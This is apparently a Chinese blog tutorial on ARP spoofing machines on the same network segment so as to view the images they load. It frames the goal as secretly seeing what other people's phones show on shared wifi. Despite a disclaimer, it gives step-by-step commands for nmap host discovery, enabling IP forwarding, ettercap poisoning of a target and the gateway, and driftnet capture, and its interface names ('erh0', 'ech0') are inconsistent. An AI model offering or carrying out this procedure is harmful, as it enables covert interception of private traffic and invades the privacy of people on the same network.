arp欺骗抓取同一网段机器访问的图片

技术可以成就一个人也可以毁了一个人,且行且珍惜!

本文章仅作为参考,切勿用于非法途径。一切后果与作者无关!

小时候,你们有过和作者一样的想法吗?
通过别人连接wifi就可以偷偷看到别人手机什么的内容。

眼看我们儿童节就要开学了,这也是抓住最后的时间完成这个想法。

首先说一下我们用到的工具:
1.kali 系统版本
2.ettercap 流量抓取
3.driftnet 图片查看
4.nmap 扫描名称

我们首先查看我们的网卡信息,网段和网关:


ifconfig   //查看网卡信息

可以得到网卡名:erh0
网段:192.168.0.0/24
网关:192.168.0.1

然后使用nmap扫描(这步是为了精确受害机如图)

这里会有设备信息
nmap -sP 192.168.0.0/24   //-sP后面是你的网段

我打算对我的物理机进行欺骗
ip为192.168.0.100

接下来我们来设置这个网段的数据都经过我们的攻击机,这有点类似burp

echo 1 >/proc/sys/net/ipv4/ip_forward //设置转发数据
cat /proc/sys/net/ipv4/ip_forward     //查看修改是否成功,默认为0修改为1则成功	

修改成功后我们打开ettercap流量监测

ettercap -G    //ettercap -G
	       //选择被攻击ip 添加1
	       //选择网关的ip添加2
	       //然后开始攻击(这里我会出个专题)

这时万事俱备,只要我们打开driftnet就可以查看目标机的访问页面了

driftnet -i ech0 //-i后面填你的网卡名字	

我们来看一下效果如图

小伙伴们有什么问题欢迎在评论区留言,作者会一一回复哦!
(由于网站原因各位填写邮箱是为了方便收到作者的回答,不会用作其他的用途!)

留下评论